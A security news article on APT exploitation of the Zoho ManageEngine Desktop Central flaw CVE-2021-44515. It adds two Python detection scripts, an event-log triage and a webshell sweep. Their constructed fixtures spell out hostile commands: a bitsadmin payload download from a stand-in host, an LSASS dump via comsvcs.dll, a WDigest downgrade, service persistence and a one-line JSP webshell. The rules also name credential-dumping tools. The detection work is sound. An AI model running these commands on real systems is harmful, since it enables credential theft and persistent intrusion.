The FBI issued an alert revealing that APT actors have been actively exploiting a zero-day vulnerability, CVE-2021-44515, in Zoho's ManageEngine Desktop Central servers.
The APT actors compromised Desktop Central servers to drop a webshell that overrides a genuine function of Desktop Central. “The actor then downloads post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempts lateral movement, and dumps credentials. The CVE-2021-44515 has been rated critical by Zoho. It addresses an authentication bypass vulnerability in the software that allows an adversary to bypass authentication and execute arbitrary code on Desktop Central servers,” the FBI said.
🚨 NEW: CVE-2021-44515 🚨 Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10…. Severity: CRITICAL https://t.co/oJBEt1StcT
— Threat Intel Center (@threatintelctr) December 16, 2021
Post-exploitation activity observed on the compromised servers included:
- DLL side-loading
- Executing “living off the land” tools, e.g. bitsadmin
- Network scanning, e.g. nbtscan, nb.exe
- PowerShell for command execution
- Persistence through a Windows service
- Downloading staged post-exploitation tools from other victim infrastructure
- Credential dumping, e.g. Mimikatz, the MiniDump export of comsvcs.dll, a WDigest downgrade (re-enabling cleartext credential caching via the UseLogonCredential registry value) and pwdump
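Most of the techniques above leave a trace in process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing). The script below is an added example, not part of the FBI alert or Zoho's software: it runs a handful of detection rules over constructed Sysmon-style events. The events, the 192.0.2.10 host, the file names and the Desktop Central install path under `C:\Program Files\DesktopCentral_Server` are all assumptions made for illustration; the path is what a default install is assumed to use, not an indicator from the alert.

```python
"""Triage Windows process-creation events for the post-exploitation
techniques in the list above. Added example; the events are constructed."""
import re

# Constructed Sysmon-style process-creation events (simplified fields).
# The DesktopCentral_Server path is an ASSUMED default install location.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami",
     "ParentImage": r"C:\Program Files\DesktopCentral_Server\jre\bin\java.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://192.0.2.10/t.exe C:\Windows\Temp\t.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\lsass.dmp full",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Temp\nbtscan.exe",
     "CommandLine": r"nbtscan.exe 10.0.0.0/24",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc create WinUpd binPath= C:\Windows\Temp\t.exe start= auto",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",   # benign control event
     "CommandLine": r"notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# (technique, event field, case-insensitive regex)
RULES = [
    ("bitsadmin download (living off the land)", "CommandLine",
     r"\bbitsadmin(\.exe)?\b.*\s/(transfer|addfile)\b"),
    ("LSASS dump via comsvcs.dll MiniDump", "CommandLine",
     r"comsvcs\.dll\W*(MiniDump|#24)\b"),          # #24 is the export ordinal of MiniDump
    ("WDigest downgrade (UseLogonCredential=1)", "CommandLine",
     r"WDigest.*UseLogonCredential.*/d\s+0*1\b"),
    ("network scanning tool", "Image", r"\\(nbtscan|nb)\.exe$"),
    ("credential dumping tool", "CommandLine", r"\b(mimikatz|pwdump)\b|sekurlsa::"),
    ("service persistence", "CommandLine", r"\bsc(\.exe)?\s+create\b"),
]


def classify(event: dict) -> list:
    """Return the technique names a single event matches (empty if benign)."""
    hits = [name for name, field, pattern in RULES
            if re.search(pattern, event.get(field, ""), re.IGNORECASE)]
    # The server's Java process should never spawn an interactive shell; a
    # cmd/powershell child of it is the classic footprint of a dropped webshell.
    if (re.search(r"DesktopCentral_Server", event.get("ParentImage", ""), re.IGNORECASE)
            and re.search(r"\\(cmd|powershell)\.exe$", event.get("Image", ""), re.IGNORECASE)):
        hits.append("shell spawned by Desktop Central service process")
    return hits


def triage(events: list) -> dict:
    """Map the index of every suspicious event to its matched techniques."""
    findings = {}
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[index] = hits
    return findings


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {index}: {', '.join(hits)}")
        print(f"    {SAMPLE_EVENTS[index]['CommandLine']}")
```

The rules deliberately key on command-line arguments rather than file hashes, because renamed binaries (the `nb.exe` copy of nbtscan is the obvious case) defeat hash matching but still need the same arguments to do their job. On a real estate, feed this the exported events rather than the constructed list and tune the parent-process rule to where Desktop Central is actually installed.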
Organizations that detect any activity matching these indicators of compromise (IOCs) within their network should act immediately.
Zoho released a ManageEngine Desktop Central Security Advisory for the newly identified vulnerability CVE-2021-44515 on December 3, 2021.
Earlier, the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI had warned in a joint advisory about ongoing exploitation of a vulnerability in Zoho’s ManageEngine ServiceDesk Plus product. Tracked as CVE-2021-44077, that unauthenticated remote code execution vulnerability affects all ServiceDesk Plus versions up to and including version 11305.
Webshell Attacks on the Rise
Per Microsoft, webshells are pervasive and popular with attackers due to their effectiveness and simple code. “A webshell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions,” Microsoft said.
As a point of entry, the attackers install webshells on servers by exploiting security gaps, typically vulnerabilities in web applications and internet-facing servers. “These attackers scan the internet, often using public scanning interfaces like shodan.io, to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities,” explained Microsoft.
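Because a webshell is just a server-side script that turns request input into code execution, the cheapest hunt is a static sweep of the web root for exactly that combination. The script below is an added example, not Microsoft's or Zoho's code: it walks a directory tree, flags JSP, ASP.NET and PHP files that contain both a command-execution primitive and request-supplied input (or string obfuscation), and runs against a constructed fixture written to a temporary directory. The `webapps/app` layout and the file names are assumptions for the demonstration; the suspicious sample is a bare signature line, not a functioning shell.

```python
"""Static webshell sweep of a web root. Added example; the fixture files
below are constructed for the demonstration."""
import os
import re
import tempfile
from pathlib import Path

WEB_EXTENSIONS = {".jsp", ".jspx", ".asp", ".aspx", ".ashx", ".php"}

# Pattern categories. A file is suspicious when it can execute code AND
# feeds that execution from the request or from an obfuscated string.
CATEGORIES = {
    "exec": [
        r"Runtime\.getRuntime\(\)\.exec\(",                 # JSP
        r"new\s+ProcessBuilder\(",                          # JSP
        r"Process\.Start\(",                                # ASP.NET
        r"\b(eval|system|passthru|shell_exec|popen|proc_open)\s*\(",  # PHP / eval
        r"\bExecute\s*\(",                                  # classic ASP / VBScript
    ],
    "input": [
        r"request\.getParameter\(",                         # JSP
        r"Request\[|Request\.(Form|QueryString|Headers)",   # ASP.NET / classic ASP
        r"\$_(GET|POST|REQUEST|COOKIE)\b",                  # PHP
    ],
    "obfuscation": [
        r"base64_decode\(|Convert\.FromBase64String\(|Base64\.getDecoder\(",
        r"str_rot13\(|gzinflate\(",
        r"(\\x[0-9a-f]{2}){8,}",                            # long hex-escaped string
    ],
}


def scan_file(path: Path) -> dict:
    """Return {category: [matched patterns]} for one file."""
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return {}
    found = {}
    for category, patterns in CATEGORIES.items():
        hits = [p for p in patterns if re.search(p, text, re.IGNORECASE)]
        if hits:
            found[category] = hits
    return found


def is_suspicious(found: dict) -> bool:
    return "exec" in found and ("input" in found or "obfuscation" in found)


def scan_tree(root) -> dict:
    """Map each suspicious file (relative, '/'-separated) to its matched categories."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            found = scan_file(path)
            if is_suspicious(found):
                results[str(path.relative_to(root)).replace(os.sep, "/")] = sorted(found)
    return results


def build_fixture(root: Path) -> None:
    """Write the constructed sample web root: two benign pages, one signature hit."""
    app = root / "webapps" / "app"
    app.mkdir(parents=True)
    (app / "index.jsp").write_text(
        '<html><body><%= "Hello, " + request.getParameter("name") %></body></html>\n')
    (app / "util.aspx").write_text(
        '<%@ Page Language="C#" %>\n'
        '<script runat="server">void Page_Load(){ Response.Write(DateTime.Now); }</script>\n')
    # Constructed signature line of a JSP webshell: request input straight into exec.
    (app / "img.jsp").write_text(
        '<%@ page import="java.io.*" %>\n'
        '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>\n')


def demo() -> dict:
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, categories in demo().items():
        print(f"SUSPICIOUS {path}: {', '.join(categories)}")
```

Requiring two categories keeps ordinary pages that only read parameters (the `index.jsp` above) out of the results, while still catching obfuscated shells that hide the input handling behind a decoded string. Pair the sweep with file modification times and the web server's access log: a script that appeared after the last deployment and is requested from a single external address is the one to pull first.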
Because webshells are simple to deploy and hard to detect, such footholds often persist for months and are discovered only after the intruders have already done substantial damage.